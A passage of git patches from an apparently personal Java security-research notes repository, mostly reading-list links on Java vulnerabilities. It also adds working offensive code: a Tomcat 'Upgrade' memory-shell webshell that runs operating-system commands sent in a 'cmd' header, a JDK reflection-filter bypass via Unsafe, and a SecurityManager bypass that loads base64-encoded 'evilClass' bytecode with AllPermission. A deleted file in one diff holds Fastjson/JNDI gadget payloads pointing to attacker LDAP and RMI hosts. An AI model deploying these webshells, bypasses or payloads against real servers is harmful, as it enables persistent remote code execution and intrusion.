Agent漏洞](https://www.freebuf.com/vuls/166695.html) + 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** + 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** ++ 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) From f4571ad0e360dbe2657a9d39c03b011de1313307 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 19:58:43 +0800 Subject: [PATCH 132/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 50449d7..b7a23e1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -169,3 +169,4 @@ + 2022/9/29 [从JDBC attack到detectCustomCollations利用范围扩展](https://xz.aliyun.com/t/11610) **扩展思路** + 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** + 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) ++ 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) From 351c10a9c59825a0a8150200a6a45494546e42d4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 21:23:33 +0800 Subject: [PATCH 133/332] Create Readme.md --- .../Upgrade/Readme.md" | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 "java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" new file mode 100644 index 0000000..66f26f0 --- /dev/null +++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" @@ -0,0 +1,92 @@ +# Upgrade + +参考:https://tttang.com/archive/1709 + +```java +package com.example.demo; + + +import org.apache.catalina.connector.Connector; +import org.apache.catalina.connector.Request; +import org.apache.catalina.connector.RequestFacade; +import org.apache.coyote.Adapter; +import org.apache.coyote.Processor; +import org.apache.coyote.Response; +import org.apache.coyote.UpgradeProtocol; +import org.apache.coyote.http11.AbstractHttp11Protocol; +import org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler; +import org.apache.tomcat.util.net.SocketWrapperBase; +import org.springframework.web.context.request.RequestContextHolder; +import org.springframework.web.context.request.ServletRequestAttributes; + +import javax.servlet.http.HttpServletRequest; +import java.lang.reflect.Field; +import java.nio.ByteBuffer; +import java.util.HashMap; + +public class UpgradeMemShell implements UpgradeProtocol { + + public UpgradeMemShell() throws Exception{ + HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest(); + RequestFacade rf = (RequestFacade) request; + Field requestField = RequestFacade.class.getDeclaredField("request"); + requestField.setAccessible(true); + Request request1 = (Request) requestField.get(rf); + + Field connector = Request.class.getDeclaredField("connector"); + connector.setAccessible(true); + Connector realConnector = (Connector) connector.get(request1); + + Field protocolHandlerField = Connector.class.getDeclaredField("protocolHandler"); + protocolHandlerField.setAccessible(true); + AbstractHttp11Protocol handler = (AbstractHttp11Protocol) protocolHandlerField.get(realConnector); + + HashMap upgradeProtocols = null; + Field upgradeProtocolsField = AbstractHttp11Protocol.class.getDeclaredField("httpUpgradeProtocols"); + upgradeProtocolsField.setAccessible(true); + upgradeProtocols = (HashMap) upgradeProtocolsField.get(handler); + upgradeProtocols.put("http2.0", this); + upgradeProtocolsField.set(handler, upgradeProtocols); + System.out.println("success"); + } + + @Override + public String getHttpUpgradeName(boolean b) { + return null; + } + + @Override + public byte[] getAlpnIdentifier() { + return new byte[0]; + } + + @Override + public String getAlpnName() { + return null; + } + + @Override + public Processor getProcessor(SocketWrapperBase socketWrapperBase, Adapter adapter) { + return null; + } + + @Override + public InternalHttpUpgradeHandler getInternalUpgradeHandler(Adapter adapter, org.apache.coyote.Request request) { + return null; + } + + public boolean accept(org.apache.coyote.Request request) { + System.out.println("MyUpgrade.accept"); + String p = request.getHeader("cmd"); + try { + String[] cmd = System.getProperty("os.name").toLowerCase().contains("windows") ? new String[]{"cmd.exe", "/c", p} : new String[]{"/bin/sh", "-c", p}; + Field response = org.apache.coyote.Request.class.getDeclaredField("response"); + response.setAccessible(true); + Response resp = (Response) response.get(request); + byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes(); + resp.doWrite(ByteBuffer.wrap(result)); + } catch (Exception e){} + return false; + } +} +``` From c5700834536524367770e550cb8302226bd601e0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 5 Oct 2022 21:24:47 +0800 Subject: [PATCH 134/332] Update Readme.md --- .../Upgrade/Readme.md" | 7 +++++++ 1 file changed, 7 insertions(+) diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" index 66f26f0..596af80 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" @@ -90,3 +90,10 @@ public class UpgradeMemShell implements UpgradeProtocol { } } ``` + +使用 +```txt +Upgrade: http2.o +cmd: calc +Connection: Upgrade +``` From 7f0fb3b6b052194022eeb6ce759e6a25b37de401 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 09:22:54 +0800 Subject: [PATCH 135/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b7a23e1..b8bc2c3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -170,3 +170,4 @@ + 2022/10/04 [为什么预编译可以防止sql注入](https://m.php.cn/faq/418626.html) **预编译可以防止sql注入的原因:允许数据库做参数化查询。在使用参数化查询的情况下,数据库不会将参数的内容视为SQL执行的一部分,而是作为一个字段的属性值来处理,这样就算参数中包含破环性语句(or ‘1=1’)也不会被执行。** + 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) + 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) ++ 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) From 7c2cd304788cb83e904b43ab71b57d177b0636a7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 15:57:15 +0800 Subject: [PATCH 136/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b8bc2c3..3625db3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -171,3 +171,4 @@ + 2022/10/05 [JavaMelody 漏洞](https://mp.weixin.qq.com/s?__biz=MzU1OTU3ODk0OQ==&mid=2247484382&idx=1&sn=bb8b97a74d99a5c361db431898a953d9&chksm=fc1469f4cb63e0e261e53faa8728ff57c72f5694034dda028d08904fe775fa1654f82cb690aa&scene=178&cur_album_id=2327370482917965825#rd) + 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) + 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) ++ 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) From 949c1f10328121fdd98f47914c38b567b483bc38 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 19:26:24 +0800 Subject: [PATCH 137/332] Create Readme.md --- Jdk/Readme.md | 65 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 Jdk/Readme.md diff --git a/Jdk/Readme.md b/Jdk/Readme.md new file mode 100644 index 0000000..7366273 --- /dev/null +++ b/Jdk/Readme.md @@ -0,0 +1,65 @@ +# JDK + +jdk>12不能反射修改下面class的成员。 +![image](https://user-images.githubusercontent.com/63966847/194300821-dd1bf0bc-b5bd-4680-aa35-49a5d4c8adb4.png) +思路是通过unsafe api去修改Reflection类的成员,赋值为null. +```java + +import sun.misc.Unsafe; +import java.io.ByteArrayOutputStream; +import java.io.InputStream; +import java.lang.reflect.Field; +import java.util.HashMap; + +public class bypass { + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } + public static byte[] readInputStream(InputStream inputStream) { + byte[] temp = new byte[4096]; + int readOneNum = 0; + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + try { + while ((readOneNum = inputStream.read(temp)) != -1) { + bos.write(temp, 0, readOneNum); + } + inputStream.close(); + }catch (Exception e){ + } + return bos.toByteArray(); + } + + public void bypassReflectionFilter()throws Exception{ + Unsafe unsafe = getUnsafe(); + Class reflectionClass=Class.forName("jdk.internal.reflect.Reflection"); + byte[] classBuffer = readInputStream(reflectionClass.getResourceAsStream("Reflection.class")); + //定义一个类,但不让类加载器知道它。 + Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null); + + Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap"); + Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); + + if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){ + unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap()); + } + if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ + unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); + } + } + public static void main(String[] args) throws Exception{ + //绕过Java 反射过滤获取ClassLoader私有字段 + //ClassLoader.class.getDeclaredField("parent");//在之前反射会报错 + new bypass().bypassReflectionFilter(); + ClassLoader.class.getDeclaredField("parent");//在之后反射可以bypass + } +} +``` +参考:https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java From 9cee9aeea248680dbeb95778f4d4a273d11ff974 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 6 Oct 2022 19:31:45 +0800 Subject: [PATCH 138/332] Update Readme.md --- Jdk/Readme.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/Jdk/Readme.md b/Jdk/Readme.md index 7366273..fd5b9b0 100644 --- a/Jdk/Readme.md +++ b/Jdk/Readme.md @@ -45,14 +45,15 @@ public class bypass { Class reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass,classBuffer,null); Field fieldFilterMapField=reflectionAnonymousClass.getDeclaredField("fieldFilterMap"); - Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); + //不需要 + //Field methodFilterMapField=reflectionAnonymousClass.getDeclaredField("methodFilterMap"); if(fieldFilterMapField.getType().isAssignableFrom(HashMap.class)){ unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(fieldFilterMapField),new HashMap()); } - if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ - unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); - } + //if(methodFilterMapField.getType().isAssignableFrom(HashMap.class)){ + // unsafe.putObject(reflectionClass,unsafe.staticFieldOffset(methodFilterMapField),new HashMap()); + //} } public static void main(String[] args) throws Exception{ //绕过Java 反射过滤获取ClassLoader私有字段 From 1e6185235b32c44dd0c0db653714953e0f592fc5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 7 Oct 2022 18:03:47 +0800 Subject: [PATCH 139/332] Create Readme.md --- JVM/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 JVM/Readme.md diff --git a/JVM/Readme.md b/JVM/Readme.md new file mode 100644 index 0000000..5c66caf --- /dev/null +++ b/JVM/Readme.md @@ -0,0 +1,5 @@ +# JVM + +>自己在学习jvm这本书会记录其中的知识点. + ++ [通过实例一行一行分析JVM的invokespecial和invokevirtual指令](http://wxweven.win/2017/09/15/JVM-invokespecial%E5%92%8Cinvokevirtual/) From 762b14c6e3e27b999147cce0112801ea4af2deae Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 7 Oct 2022 18:04:22 +0800 Subject: [PATCH 140/332] Delete jndi-gadgets.md --- jndi-gadgets.md | 33 --------------------------------- 1 file changed, 33 deletions(-) delete mode 100644 jndi-gadgets.md diff --git a/jndi-gadgets.md b/jndi-gadgets.md deleted file mode 100644 index bad3ffb..0000000 --- a/jndi-gadgets.md +++ /dev/null @@ -1,33 +0,0 @@ -``` -{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"} - -{"object":["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"rmi://localhost:8088/Exploit", "loginTimeout":0}]} - -InputStream in = new FileInputStream("C3P0.ser"); -byte[] data = toByteArray(in); -in.close(); -String HexString = bytesToHexString(data, data.length); -String poc = "{\"object\":[\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",{\"userOverridesAsString\":\"HexAsciiSerializedMap:"+ HexString + ";\"}]}"; -System.out.println(poc); - -public static byte[] toByteArray(InputStream in) throws IOException { - byte[] classBytes; - classBytes = new byte[in.available()]; - in.read(classBytes); - in.close(); - return classBytes; -} - -public static String bytesToHexString(byte[] bArray, int length) { - StringBuffer sb = new StringBuffer(length); - for(int i = 0; i < length; ++i) { - String sTemp = Integer.toHexString(255 & bArray[i]); - if (sTemp.length() < 2) { - sb.append(0); - } - - sb.append(sTemp.toUpperCase()); - } - return sb.toString(); -} -``` From 4459f1ac2c68be882cab1c9482f093b18b02b532 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 7 Oct 2022 18:06:09 +0800 Subject: [PATCH 141/332] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 7a7d092..afcf094 100644 --- a/README.md +++ b/README.md @@ -22,6 +22,8 @@ + 2022/01/14 [添加了dubbo漏洞分析](Dubbo) 💛 💙 💜 ❤️ 💚 + 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚 + 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加JDK里面的trick](JDK) 💛 💙 💜 ❤️ 💚 From 8673174ad5c42e9c1cb265472803a566adf6fcef Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 8 Oct 2022 10:17:05 +0800 Subject: [PATCH 142/332] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 41c4596..0bc0205 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -25,3 +25,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2021/12/21 [绕过后缀安全检查进行文件上传-2](https://www.sec-in.com/article/1328) **只能说非常np了,servlet单例,属性在调用时会被共享,存在线程安全问题。扩展一下java中volatile有可能存在线程安全问题[参考](https://github.com/Firebasky/Java/blob/main/java%E6%97%A5%E5%B8%B8/Thinking_in_java%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile.md)** 看看能不能搭建一个环境复现一下。。。。 + 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) ++ 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** From 5e0164f00de0a38b9bcca1d1d0aea0259c7fe62c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 8 Oct 2022 10:18:03 +0800 Subject: [PATCH 143/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 3625db3..368e047 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -172,3 +172,4 @@ + 2022/10/05 [一种新的Tomcat内存马 - Upgrade内存马](https://tttang.com/archive/1709) + 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) + 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) ++ 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 6d147dde23625d4cd2330f05326625ab242f269a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 8 Oct 2022 21:30:19 +0800 Subject: [PATCH 144/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 368e047..d01111e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -173,3 +173,4 @@ + 2022/10/06 [HSQLDB 安全测试指南](https://b1ue.cn/archives/458.html) + 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) + 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) From 85590784b125ec6df20b93a445346f87a5bd2f78 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 10 Oct 2022 17:01:17 +0800 Subject: [PATCH 145/332] Create BypassOfCreateClassLoader.java --- BypassSM/BypassOfCreateClassLoader.java | 54 +++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 BypassSM/BypassOfCreateClassLoader.java diff --git a/BypassSM/BypassOfCreateClassLoader.java b/BypassSM/BypassOfCreateClassLoader.java new file mode 100644 index 0000000..21ec80e --- /dev/null +++ b/BypassSM/BypassOfCreateClassLoader.java @@ -0,0 +1,54 @@ +package com.evil; + +import java.security.*; +import java.security.cert.Certificate; + +public class MyPoc { + //-Djava.security.manager -Djava.security.policy==bypass-by-createclassloader.policy + static { + try { + Exp(); + } catch (Exception e) { + e.printStackTrace(); + } + } + + public static void Exp() throws Exception{ + BypassClassLoader0 bypassClassLoader = new BypassClassLoader0(); + Class aClass0 = bypassClassLoader.get(base64Decode("yv66vgAAADQAHwoABgAWBwAXCgACABYKABgAGQcAGgcAGwEADElubmVyQ2xhc3NlcwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQALTGV2aWxDbGFzczsBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOZXZpbENsYXNzLmphdmEMAAgACQEAC2V2aWxDbGFzcyQxBwAcDAAdAB4BAAlldmlsQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAeamF2YS9zZWN1cml0eS9BY2Nlc3NDb250cm9sbGVyAQAMZG9Qcml2aWxlZ2VkAQA0KExqYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb247KUxqYXZhL2xhbmcvT2JqZWN0OwAhAAUABgAAAAAAAwABAAgACQABAAoAAAAvAAEAAQAAAAUqtwABsQAAAAIACwAAAAYAAQAAAAQADAAAAAwAAQAAAAUADQAOAAAACQAPABAAAQAKAAAAKwAAAAEAAAABsQAAAAIACwAAAAYAAQAAABUADAAAAAwAAQAAAAEAEQASAAAACAATAAkAAQAKAAAAKAACAAAAAAAMuwACWbcAA7gABFexAAAAAQALAAAACgACAAAABgALABEAAgAUAAAAAgAVAAcAAAAKAAEAAgAAAAAACA=="), "evilClass"); + bypassClassLoader.get(base64Decode("yv66vgAAADQALQoACAAcCgAdAB4IAB8KAB0AIAcAIQoABQAiBwAjBwAkBwAlAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAxJbm5lckNsYXNzZXMBAA1MZXZpbENsYXNzJDE7AQADcnVuAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAR2YXIyAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAIQEAClNvdXJjZUZpbGUBAA5ldmlsQ2xhc3MuamF2YQEAD0VuY2xvc2luZ01ldGhvZAcAJgwACgALBwAnDAAoACkBAARjYWxjDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAAsAAsBAAtldmlsQ2xhc3MkMQEAEGphdmEvbGFuZy9PYmplY3QBAB5qYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb24BAAlldmlsQ2xhc3MBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlADAABwAIAAEACQAAAAIAAAAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAGAA4AAAAMAAEAAAAFAA8AEQAAAAEAEgATAAEADAAAAGoAAgACAAAAErgAAhIDtgAEVwGwTCu2AAYBsAABAAAACgALAAUAAwANAAAAFgAFAAAACQAJAAoACwALAAwADAAQAA0ADgAAABYAAgAMAAYAFAAVAAEAAAASAA8AEQAAABYAAAAGAAFLBwAXAAMAGAAAAAIAGQAaAAAABAAbAAAAEAAAAAoAAQAHAAAAAAAI"), "evilClass$1"); + Class.forName(aClass0.getName(), true, bypassClassLoader); + } + + public static byte[] base64Decode(String bs) throws Exception { + Class base64; + byte[] value = null; + try { + base64 = Class.forName("java.util.Base64"); + Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); + value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); + } catch (Exception e) { + try { + base64 = Class.forName("sun.misc.BASE64Decoder"); + Object decoder = base64.newInstance(); + value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); + } catch (Exception e2) { + } + } + return value; + } + + public static class BypassClassLoader0 extends ClassLoader{ + public Class get(byte[] b,String name) { + PermissionCollection pc = new Permissions(); + pc.add(new AllPermission()); + //设置ProtectionDomain + ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null); + return super.defineClass(name, b, 0, b.length,pd); + } + } + + public static void main(String[] args) { + + } +} From 6217236b2173ab841592262c9afb274e370edcea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 11 Oct 2022 23:44:18 +0800 Subject: [PATCH 146/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d01111e..47eaea1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -174,3 +174,4 @@ + 2022/10/06 [Linux terminal/tty/pty and shell](https://kangxiaoning.github.io/post/2021/05/linux-terminal-tty-pty-and-shell/) + 2022/10/08 [利用ModSecurity内置实现第一代 rasp](https://mp.weixin.qq.com/s?__biz=Mzg3ODY3MzcwMQ==&mid=2247489448&idx=1&sn=3a64455cb703152d9f69b3fa3657f7f7&chksm=cf117de2f866f4f46b088ca106911db77ef7e16b3408ef5c3f3d893c99432227f38ed0969367&mpshare=1&scene=23&srcid=1008ouxJsQWdvxgKPMzYC9x0&sharer_sharetime=1665193299451&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/10/08 [WAF bypasses via 0days](https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec) ++ 2022/10/11 [记一次 Tomcat 部署 WAR 包拦截绕过的深究](https://www.ch1ng.com/blog/264.html) **文件上传也可以绕过** From 496002a3fd1a6b269809251196271e9a5f6aac66 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 12 Oct 2022 14:32:12 +0800 Subject: [PATCH 147/332] Create Readme.md --- Jdk/dnsrebinding/Readme.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 Jdk/dnsrebinding/Readme.md diff --git a/Jdk/dnsrebinding/Readme.md b/Jdk/dnsrebinding/Readme.md new file mode 100644 index 0000000..cf62f1a --- /dev/null +++ b/Jdk/dnsrebinding/Readme.md @@ -0,0 +1,13 @@ +# java rebinding + +http://www.loongten.com/2020/02/26/dns-rebinding-bypass + +http://www.lpnote.com/2018/11/23/java-dns-cache/ + +https://www.xmanblog.net/java-dns-rebinding-ssrf/ + +https://paper.seebug.org/390/ + +https://powerdns.org/hello-dns/ + +http://www.ruanyifeng.com/blog/2016/06/dns.html From 795475bb6737abce9f7fed6aca3a9e8df3f135d8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 14 Oct 2022 20:46:01 +0800 Subject: [PATCH 148/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 47eaea1..98eec1b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ 